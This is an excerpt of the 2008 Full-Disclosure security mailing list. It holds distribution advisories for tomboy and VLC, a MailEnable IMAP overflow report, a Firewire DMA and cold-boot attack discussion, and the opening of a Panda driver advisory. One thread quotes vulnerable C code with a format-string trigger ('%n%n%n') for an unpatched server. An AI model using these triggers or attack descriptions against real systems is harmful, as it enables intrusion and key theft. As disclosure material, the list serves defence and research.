2008.0/x86_64/evolution-pilot-2.12.3-1.2mdv2008.0.x86_64.rpm bf7431bd51a057d8ef5a80d541ad8de1 2008.0/SRPMS/evolution-2.12.3-1.2mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFH0IDwmqjQ0CJFipgRAmtrAKCGVdhPZQGuGThz2nx5+nPDwLQVHwCfXkVE Qh479nJKUgUhwrrDha/xGKA= =GDLZ -----END PGP SIGNATURE----- From demottja at msu.edu Fri Mar 7 14:47:41 2008 From: demottja at msu.edu (Jared DeMott) Date: Fri, 07 Mar 2008 09:47:41 -0500 Subject: [Full-disclosure] Hackers are having a positive influence on the world Message-ID: <47D1558D.80706@msu.edu> http://www.hackersforcharity.org/ Join the fun! Jared From david.judais at googlemail.com Fri Mar 7 13:53:33 2008 From: david.judais at googlemail.com (David Judais) Date: Fri, 7 Mar 2008 08:53:33 -0500 Subject: [Full-disclosure] Vulnerability in Linux Kiss Server v1.2 In-Reply-To: <66e421d70803051329n12d82a8etf4fc714258025c27@mail.gmail.com> References: <66e421d70803051329n12d82a8etf4fc714258025c27@mail.gmail.com> Message-ID: <66e421d70803070553h2891a9beq1472bdf156ef41bc@mail.gmail.com> Sorry, my response became detached from the original thread somehow. On Wed, Mar 5, 2008 at 4:29 PM, David Judais wrote: > Why isn't there a patch? > > > From: vashnukad at vashnukad.com > > > Site: http://www.vashnukad.com > > Application: Linux Kiss Server v1.2 > > Type: Format strings > > Priority: Medium > > Patch available: No > > > The Linux Kiss Server contains a format strings vulnerability that, if run > in foreground mode, can be leveraged for access. The vulnerability is > demonstrated in the code below: > > Function log_message(): > > if(background_mode == 0) > > { > > if(type == 'l') > > fprintf(stdout,log_msg); > > > if(type == 'e') > > fprintf(stderr,log_msg); > > free(log_msg); > > } > > > > > Function kiss_parse_cmd(): > > > > /* check full command name */ > > if (strncmp(cmd, buf, cmd_len)) > > { > > asprintf(&log_msg,"unknow command: `%s'", buf); > > log_message(log_msg,'e'); > > goto error; > > } > > buf += cmd_len; > > > > So putting something like %n%n%n in 'buf' you can trigger the > vulnerability. > > > -- > > Name: Vashnukad > > E-mail: vashnukad at vashnukad.com > > Site: http://www.vashnukad.com > > > > > -- > > Name: Vashnukad > > e-mail: vashnukad at vashnukad.com > > Site: http://www.vashnukad.com > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080307/2df8c068/attachment.html From thor at hammerofgod.com Fri Mar 7 17:42:28 2008 From: thor at hammerofgod.com (Thor (Hammer of God)) Date: Fri, 7 Mar 2008 09:42:28 -0800 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <20080306200009.GB5138@sentinelchicken.org> References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> Message-ID: I made a short reply to this yesterday, but it probably came off as flippant and thus didn't get posted. However, if one insists on leaving their machine unattended in a public place, but have at least locked it, but are still worried that someone will use a hardware-based firewire attack, then just disable the host controller in the first place and be done with it. Or, if one is already using a firewire device, but has walked away and left their laptop alone in a public place along with that firewire device on and activated and are worried about someone coming along and plugging in their own in order to grab your Bitlocker key, then don't have autorun (which is default) automatically enabled for the device. Of course that won't stop someone of opening up the laptop with their handy-dandy Leatherman and using canned air turned upside down to "freeze" the memory chip, take it out, put it in their laptop, search for the key in memory, and then put it back in the other box to then steal the data. But more to Mr. Grimes original point, I actually don't mind seeing this put as a "Vista" attack, be it "unpatched," or an attack against the activation mechanism, or whatever. If the "Vista Firewire" attack is what it takes for people to get into the news about Vista "vulnerabilities," then I consider that a good thing. t > -----Original Message----- > From: Tim [mailto:tim-security at sentinelchicken.org] > Sent: Thursday, March 06, 2008 12:00 PM > To: Larry Seltzer > Cc: Full Disclosure; Bugtraq > Subject: Re: [Full-disclosure] Firewire Attack on Windows Vista > > > What are the implications for firewire device compatibility of doing > > this? > > I am no expert on ieee1394, but I have read up a bit on this and tested > Metlstorm's memory dumping tool and here's what I understand: > > Firewire chipsets allow drivers to configure a particular memory range > which is open to access by DMA devices. Since the memory transfers > occur completely without software intervention, the only way to > restrict > this is to tell the chip ahead of time what to allow and what not to > allow. Before these tools came out, most free OSes simply opened up > access completely to physical memory for any device. However, Windows > would not do this. It would only open up access to devices that it > thought needed DMA. This is why Metlstorm had to make his Linux machine > behave like an iPod to fool Windows into spreading it's legs. > > Since the exploit tools came out for this, free OSes quickly started > providing options to tell the chips not to open up access. I have > tested the Linux drivers with the phys_dma=0 option, and found that > some > disk devices worked fine while others did not. I can confirm that the > memory dumping tools did not work with this option set. > > Of course this is not an optimal fix. The drivers should just > automatically restrict the DMA accesses in real time to a range that is > safe but still permits devices to use it. (Presumably to buffers > allocated specifically for I/O.) Not sure if some devices would still > have problems with this, but I think this is the intended operation of > ieee1394 based on the specs and I'd imagine it would work on a greater > number of devices than having it disabled completely. > > Someone please correct me if I'm wrong on any of this. > > tim From jay.tomas at infosecguru.com Fri Mar 7 17:39:15 2008 From: jay.tomas at infosecguru.com (Jay) Date: Fri, 7 Mar 2008 12:39:15 -0500 Subject: [Full-disclosure] IE8 beta is available - Challenge Message-ID: <8F9509A5731B413CB46E77D7DE780385.MAI@thewolfenet.com> Who can be the one to find and publish the first exploit? http://www.microsoft.com/windows/products/winfamily/ie/ie8/readiness/Install.htm Jay From Larry at larryseltzer.com Fri Mar 7 18:00:55 2008 From: Larry at larryseltzer.com (Larry Seltzer) Date: Fri, 7 Mar 2008 13:00:55 -0500 Subject: [Full-disclosure] IE8 beta is available - Challenge In-Reply-To: <8F9509A5731B413CB46E77D7DE780385.MAI@thewolfenet.com> References: <8F9509A5731B413CB46E77D7DE780385.MAI@thewolfenet.com> Message-ID: <0273B67044957C41BD71D12EBA2E00AE252F23@becca.LarrySeltzer.local> >>Who can be the one to find and publish the first exploit? I hear you can completely compromise an IE8 system through the Firewire port. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com From kurtdillard at msn.com Fri Mar 7 18:22:40 2008 From: kurtdillard at msn.com (Kurt Dillard) Date: Fri, 7 Mar 2008 16:22:40 -0200 Subject: [Full-disclosure] IE8 beta is available - Challenge In-Reply-To: <8F9509A5731B413CB46E77D7DE780385.MAI@thewolfenet.com> References: <8F9509A5731B413CB46E77D7DE780385.MAI@thewolfenet.com> Message-ID: Breaking pre-release software doesn't sound all that impressive but I'm sure Microsoft would appreciate more people helping them to find bugs;) -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Jay Sent: Friday, March 07, 2008 3:39 PM To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] IE8 beta is available - Challenge Who can be the one to find and publish the first exploit? http://www.microsoft.com/windows/products/winfamily/ie/ie8/readiness/Install htm Jay From oliver.starke at aipermon.com Fri Mar 7 18:09:52 2008 From: oliver.starke at aipermon.com (Oliver Starke) Date: Fri, 7 Mar 2008 19:09:52 +0100 Subject: [Full-disclosure] IE8 beta is available - Challenge In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252F23@becca.LarrySeltzer.local> References: <8F9509A5731B413CB46E77D7DE780385.MAI@thewolfenet.com> <0273B67044957C41BD71D12EBA2E00AE252F23@becca.LarrySeltzer.local> Message-ID: <20080307190952.61fc3491@DEVICE2.actimon.de> LOL :) On Fri, 7 Mar 2008 13:00:55 -0500 "Larry Seltzer" wrote: > >>Who can be the one to find and publish the first exploit? > > I hear you can completely compromise an IE8 system through the > Firewire port. > > Larry Seltzer > eWEEK.com Security Center Editor > http://security.eweek.com/ > http://blogs.pcmag.com/securitywatch/ > Contributing Editor, PC Magazine > larry.seltzer at ziffdavisenterprise.com > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- Oliver Starke Research & Development Aipermon GmbH & Co. KG Fon: +49-89-97890-123 Fax: +49-89-97890-199 Email: oliver.starke at aipermon.de Aipermon GmbH & Co. KG / Sitz: Zamdorfer Str.100, 81677 Muenchen / Amtsgericht Muenchen / HRA 88852 / USt.-ID: DE241346387 Persoenlich haftende Gesellschaft: Aipermon Beteiligungs-GmbH / Sitz: Zamdorfer Str. 100, 81677 Muenchen / Amtsgericht: Muenchen / HRB 164406 / Steuer Nr: 143/200/00662 Geschaeftsfuehrer: Dr. Thomas Schweizer, Dominik Wegertseder From aluigi at autistici.org Fri Mar 7 19:00:40 2008 From: aluigi at autistici.org (Luigi Auriemma) Date: Fri, 7 Mar 2008 20:00:40 +0100 Subject: [Full-disclosure] Multiple vulnerabilities in MailEnable Professional/Enterprise 3.13 Message-ID: <20080307200040.e3b46e97.aluigi@autistici.org> ####################################################################### Luigi Auriemma Application: MailEnable Professional and Enterprise http://www.mailenable.com Versions: <= 3.13 Platforms: Windows Bugs: A] multiple post-auth buffer-overflows B] NULL pointers Exploitation: remote, versus the IMAP service Date: 07 Mar 2008 Author: Luigi Auriemma e-mail: aluigi at autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== MailEnable is a mail server for Windows which supports various protocols like SMTP, POP3, IMAP, webmail and a HTTPMail service. ####################################################################### ======= 2) Bugs ======= -------------------------------------- A] multiple post-auth buffer-overflows -------------------------------------- The IMAP service (MEIMAPS.exe) of MailEnable is affected by some buffer-overflow vulnerabilities caused by too long parameters passed to the FETCH, EXAMINE and UNSUBSCRIBE commands allowing an attacker to execute malicious code. All the vulnerable commands require an account to be exploited. ---------------- B] NULL pointers ---------------- The IMAP service is affected also by two NULL pointer vulnerabilities exploitable through the omission of the required arguments for the SEARCH and APPEND commands, where the first can be used by unauthenticated attackers too. ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/maildisable.zip ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma http://aluigi.org From thor at hammerofgod.com Fri Mar 7 19:40:11 2008 From: thor at hammerofgod.com (Thor (Hammer of God)) Date: Fri, 7 Mar 2008 11:40:11 -0800 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> Message-ID: > key, then don't have autorun (which is default) automatically enabled > for the device. Thanks to Blue Boar for pointing out that autorun doesn't have anything to do with it if the attack device can have the drivers automatically installed (and, of course, that the host controller is enabled). Original points stand... t From Larry at larryseltzer.com Fri Mar 7 19:44:12 2008 From: Larry at larryseltzer.com (Larry Seltzer) Date: Fri, 7 Mar 2008 14:44:12 -0500 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> Message-ID: <0273B67044957C41BD71D12EBA2E00AE252F29@becca.LarrySeltzer.local> Let's say the computer is off. You can turn it on, but that gets you to a login screen. What can the Firewire device do? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com From Larry at larryseltzer.com Fri Mar 7 19:51:07 2008 From: Larry at larryseltzer.com (Larry Seltzer) Date: Fri, 7 Mar 2008 14:51:07 -0500 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252F29@becca.LarrySeltzer.local> References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> <0273B67044957C41BD71D12EBA2E00AE252F29@becca.LarrySeltzer.local> Message-ID: <0273B67044957C41BD71D12EBA2E00AE252F2B@becca.LarrySeltzer.local> >>Let's say the computer is off. You can turn it on, but that gets you to a login screen. What can the Firewire device do? OK, I guess I misunderstood the original paper (http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks .pdf). It now looks to me like they are claiming they can disable password authentication *even while the system is not logged on* - do I have that right? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com From thor at hammerofgod.com Fri Mar 7 19:55:19 2008 From: thor at hammerofgod.com (Thor (Hammer of God)) Date: Fri, 7 Mar 2008 11:55:19 -0800 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252F2B@becca.LarrySeltzer.local> References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> <0273B67044957C41BD71D12EBA2E00AE252F29@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE252F2B@becca.LarrySeltzer.local> Message-ID: The main point is to grab encryption keys from memory where the drive is encrypted - but that has to be while the device is on. I mean, it doesn't really matter if you disable password auth when you have physical access as you can just take the drive out, boot from CD, etc... t > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk [mailto:full- > disclosure-bounces at lists.grok.org.uk] On Behalf Of Larry Seltzer > Sent: Friday, March 07, 2008 11:51 AM > To: Bugtraq; Full Disclosure > Subject: Re: [Full-disclosure] Firewire Attack on Windows Vista > > >>Let's say the computer is off. You can turn it on, but that gets you > to a login screen. What can the Firewire device do? > > OK, I guess I misunderstood the original paper > (http://www.sec- > consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks > .pdf). It now looks to me like they are claiming they can disable > password authentication *even while the system is not logged on* - do I > have that right? > > Larry Seltzer > eWEEK.com Security Center Editor > http://security.eweek.com/ > http://blogs.pcmag.com/securitywatch/ > Contributing Editor, PC Magazine > larry.seltzer at ziffdavisenterprise.com > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From vashnukad1 at gmail.com Fri Mar 7 21:05:02 2008 From: vashnukad1 at gmail.com (vashnukad vashnukad) Date: Fri, 7 Mar 2008 16:05:02 -0500 Subject: [Full-disclosure] Vulnerability in Linux Kiss Server v1.2 In-Reply-To: References: <66e421d70803051329n12d82a8etf4fc714258025c27@mail.gmail.com> Message-ID: I have not yet notified the vendors. -- Name: Vashnukad e-mail: vashnukad at vashnukad.com Site: http://www.vashnukad.com > On 3/5/08, David Judais wrote: > > Why isn't there a patch? > > > > > From: vashnukad at vashnukad.com > > > > > Site: http://www.vashnukad.com > > > > Application: Linux Kiss Server v1.2 > > > > Type: Format strings > > > > Priority: Medium > > > > Patch available: No > > > > > > The Linux Kiss Server contains a format strings vulnerability that, if run > > in foreground mode, can be leveraged for access. The vulnerability is > > demonstrated in the code below: > > > > Function log_message(): > > > > if(background_mode == 0) > > > > { > > > > if(type == 'l') > > > > fprintf(stdout,log_msg); > > > > > > if(type == 'e') > > > > fprintf(stderr,log_msg); > > > > free(log_msg); > > > > } > > > > > > > > > > Function kiss_parse_cmd(): > > > > > > > > /* check full command name */ > > > > if (strncmp(cmd, buf, cmd_len)) > > > > { > > > > asprintf(&log_msg,"unknow command: `%s'", buf); > > > > log_message(log_msg,'e'); > > > > goto error; > > > > } > > > > buf += cmd_len; > > > > > > > > So putting something like %n%n%n in 'buf' you can trigger the > vulnerability. > > > > > > -- > > > > Name: Vashnukad > > > > E-mail: vashnukad at vashnukad.com > > > > Site: http://www.vashnukad.com > > > > > > > > > > -- > > > > Name: Vashnukad > > > > e-mail: vashnukad at vashnukad.com > > > > Site: http://www.vashnukad.com > > > From security at mandriva.com Fri Mar 7 21:06:13 2008 From: security at mandriva.com (security at mandriva.com) Date: Fri, 07 Mar 2008 14:06:13 -0700 Subject: [Full-disclosure] [ MDVSA-2008:064 ] - Updated tomboy packages fix improper LD_LIBRARY_PATH handling Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:064 http://www.mandriva.com/security/ _______________________________________________________________________ Package : tomboy Date : March 7, 2008 Affected: 2007.1, 2008.0 _______________________________________________________________________ Problem Description: A flaw in how tomboy handles LD_LIBRARY_PATH was discovered where by appending paths to LD_LIBRARY_PATH the program would also search the current directory for shared libraries. In directories containing network data, those libraries could be injected into the application. The updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4790 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: e4fec795476776d6cdeb2b875dde8c17 2007.1/i586/tomboy-0.6.1-3.1mdv2007.1.i586.rpm b3f45b1dfc59d49c770529b1d2458c61 2007.1/SRPMS/tomboy-0.6.1-3.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: a73e1c14a26e577b6306b70ff2084e74 2007.1/x86_64/tomboy-0.6.1-3.1mdv2007.1.x86_64.rpm b3f45b1dfc59d49c770529b1d2458c61 2007.1/SRPMS/tomboy-0.6.1-3.1mdv2007.1.src.rpm Mandriva Linux 2008.0: e200a429f743429bfd741ce9f8c71152 2008.0/i586/tomboy-0.8.0-1.1mdv2008.0.i586.rpm 54b18c82a1f0037a94c394a0203cb3bc 2008.0/SRPMS/tomboy-0.8.0-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 6698979ccf4f777c5111794f63a82604 2008.0/x86_64/tomboy-0.8.0-1.1mdv2008.0.x86_64.rpm 54b18c82a1f0037a94c394a0203cb3bc 2008.0/SRPMS/tomboy-0.8.0-1.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFH0YOhmqjQ0CJFipgRAgSmAJ9otgdVwjfflVe6jpml6bwdnSEqRQCg47aY Q2rEjKTOGDGKOt2GK6QFVE4= =2bbj -----END PGP SIGNATURE----- From py at gentoo.org Fri Mar 7 23:17:12 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Sat, 08 Mar 2008 00:17:12 +0100 Subject: [Full-disclosure] [ GLSA 200803-13 ] VLC: Multiple vulnerabilities Message-ID: <47D1CCF8.7090302@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: VLC: Multiple vulnerabilities Date: March 07, 2008 Bugs: #203345, #211575, #205299 ID: 200803-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities were found in VLC, allowing for the execution of arbitrary code and Denial of Service. Background ========== VLC is a cross-platform media player and streaming server. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-video/vlc < 0.8.6e >= 0.8.6e Description =========== Multiple vulnerabilities were found in VLC: * Michal Luczaj and Luigi Auriemma reported that VLC contains boundary errors when handling subtitles in the ParseMicroDvd(), ParseSSA(), and ParseVplayer() functions in the modules/demux/subtitle.c file, allowing for a stack-based buffer overflow (CVE-2007-6681). * The web interface listening on port 8080/tcp contains a format string error in the httpd_FileCallBack() function in the network/httpd.c file (CVE-2007-6682). * The browser plugin possibly contains an argument injection vulnerability (CVE-2007-6683). * The RSTP module triggers a NULL pointer dereference when processing a request without a "Transport" parameter (CVE-2007-6684). * Luigi Auriemma and Remi Denis-Courmont found a boundary error in the modules/access/rtsp/real_sdpplin.c file when processing SDP data for RTSP sessions (CVE-2008-0295) and a vulnerability in the libaccess_realrtsp plugin (CVE-2008-0296), possibly resulting in a heap-based buffer overflow. * Felipe Manzano and Anibal Sacco (Core Security Technologies) discovered an arbitrary memory overwrite vulnerability in VLC's MPEG-4 file format parser (CVE-2008-0984). Impact ====== A remote attacker could send a long subtitle in a file that a user is enticed to open, a specially crafted MP4 input file, long SDP data, or a specially crafted HTTP request with a "Connection" header value containing format specifiers, possibly resulting in the remote execution of arbitrary code. Also, a Denial of Service could be caused and arbitrary files could be overwritten via the "demuxdump-file" option in a filename in a playlist or via an EXTVLCOPT statement in an MP3 file. Workaround ========== There is no known workaround at this time. Resolution ========== All VLC users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-video/vlc-0.8.6e" References ========== [ 1 ] CVE-2007-6681 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6681 [ 2 ] CVE-2007-6682 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6682 [ 3 ] CVE-2007-6683 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6683 [ 4 ] CVE-2007-6684 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6684 [ 5 ] CVE-2008-0295 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0295 [ 6 ] CVE-2008-0296 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0296 [ 7 ] CVE-2008-0984 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0984 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-13.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFH0cz4uhJ+ozIKI5gRAku2AJ48uLioRmDL3ULyqGRGGQJQj0A0YACgowss NSRHQSa+5Fq4jOY2CxzrRuU= =pnZh -----END PGP SIGNATURE----- From kain at kain.org Fri Mar 7 21:53:40 2008 From: kain at kain.org (Bryon Roche) Date: Fri, 7 Mar 2008 21:53:40 +0000 (UTC) Subject: [Full-disclosure] Firewire Attack on Windows Vista References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> <0273B67044957C41BD71D12EBA2E00AE252F29@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE252F2B@becca.LarrySeltzer.local> Message-ID: On Fri, 07 Mar 2008 14:51:07 -0500, Larry Seltzer wrote: >>>Let's say the computer is off. You can turn it on, but that gets you > to a login screen. What can the Firewire device do? > > OK, I guess I misunderstood the original paper > (http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks > .pdf). It now looks to me like they are claiming they can disable > password authentication *even while the system is not logged on* - do I > have that right? Larry, Are you familiar with ICE or JTAG debugging hardware? ieee1394 is implemented by default in such a fashion that a ieee1394 port can basically be used as a hardware debugger to memory. i.e. any ieee1394 device can poke/peek the entire _physical memory space_ of any other device on the bus. With that capability you can do anything that could be accomplished from the internals of the operating system. The essential flaw here is that current SBP-2 drivers do not set up a proper virtual memory map between the firewire chipset and the host, and just expose the entire host's physical address space. Fixing this requires reimplementing a good deal of design and buffering for the SBP-2 (that's the firewire SCSI block protocol) drivers. I however, don't know enough about windows drivers and disk access to elaborate from there about how hard that will be to fix in the windows world. What people seem to be missing is that this condition is *fixable*, but the real impetus may not be there outside of folks from the Trusted Computing crowd etc etc. What points are you trying to stab at for an article? From Larry at larryseltzer.com Sat Mar 8 12:12:32 2008 From: Larry at larryseltzer.com (Larry Seltzer) Date: Sat, 8 Mar 2008 07:12:32 -0500 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> <0273B67044957C41BD71D12EBA2E00AE252F29@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE252F2B@becca.LarrySeltzer.local> Message-ID: <0273B67044957C41BD71D12EBA2E00AE252F35@becca.LarrySeltzer.local> >>What points are you trying to stab at for an article? You've hit on them pretty well. My own experience with DMA programming was 20 years ago with real mode DOS drivers, but I was surprised to learn from this thread that a DMA mass storage device on Linux, Mac and Windows gets unimpeded access to the full stretch of system memory. I take what I read here with a grain of salt, but the non-nut cases seem to be out and in agreement, at least about that. I'm not going to be writing a 20 page paper. I think I have 2 main questions I'll write about: How much should you worry about this and is it fixable (beyond disabling DMA, which is not a good solution if you ask me). You say it's fixable; that still leaves some questions for me whether the fix comes at the expense just of additional sophistication in the Firewire drivers or also a performance burden. I'll probably just leave it at a question. I actually do have a response fom Microsoft on the broader issue, but it doesn't address these issues or even concded that there's necessarily anything they can do about it. They instead speak of the same precautions for physical access that they spoke of a couple weeks ago with respect to the "frozen notebook memory" attack - use drive encryption, use 2-factor authentication, use hibernate instead of sleep, use group policy to enforce them. I don't think it's a bad response under the circumstances. The fact that you can turn off DMA on Linux seems in fact inferior to simply disabling the Firewire port and driver at run-time in Windows. They both suck as solutions. Incidentally, Microsoft made a few other points in their response that were interesting, but raised more questions than they answered: * it's possible for a user to disable 1394 DMA. I'm still looking into how you can do this. * it's possible for a user to "constrain a DMA device's memory access to specific ranges by using the physical DMA type." They say that some devices cannot be so restricted at all, and for others the restriction would only come at the cost of additional complexity and a performance hit, as I allude to above. I assume these considerations are generic to the hardware and not specific to Windows. How much should the average user worry about this? Not very much. Most notebooks from average users don't even have Firewire on them and you would have an easier time cracking them with a dictionary attack on the password and other such things, which means that this attack makes you no more vulnerable to compromise if you've already granted physical access than you were before. The frozen notebook memory attack seems a little too Mission Impossible for me to get worked up about. And if you're the sort of high-value target who needs to worrry about this sort of attack, there are measures you can take: use drive encryption, use 2-factor authentication, use hibernate instead of sleep, use group policy to enforce them. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com From tk at trapkit.de Sat Mar 8 13:16:30 2008 From: tk at trapkit.de (Tobias Klein) Date: Sat, 8 Mar 2008 14:16:30 +0100 (MET) Subject: [Full-disclosure] [TKADV2008-001] Panda Internet Security/Antivirus+Firewall 2008 cpoint.sys Kernel Driver Memory Corruption Vulnerability Message-ID: <200803081316.m28DGUEl000867@post.webmailer.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Advisory: Panda Internet Security/Antivirus+Firewall 2008 cpoint.sys Kernel Driver Memory Corruption Vulnerability Advisory ID: TKADV2008-001 Revision: 1.0 Release Date: 2008/03/08 Last Modified: 2008/03/08 Date Reported: 2008/01/08 Author: Tobias Klein (tk at trapkit.de) Affected Software: Panda Internet Security 2008 Panda Antivirus+Firewall 2008 Remotely Exploitable: No Locally Exploitable: Yes Vendor URL: http://www.pandasecurity.com Vendor Status: Vendor has released a hotfix Patch development time: 60 days ====================== Vulnerability details: ====================== The kernel driver cpoint.sys shipped with Panda Internet Security and Antivirus+ Firewall 2008 contains a vulnerability in the code that handles IOCTL requests. Exploitation of this vulnerability can result in: 1) local denial of service attacks (system crash due to a kernel panic), or 2) local execution of arbitrary code at the kernel level (complete system compromise) The issue can be triggered by sending a specially crafted IOCTL request. No special user rights are necessary to exploit the vulnerability. ====================== Technical description: ====================== The IOCTL call 0xba002848 of the cpoint.sys kernel driver shipped with Panda Internet 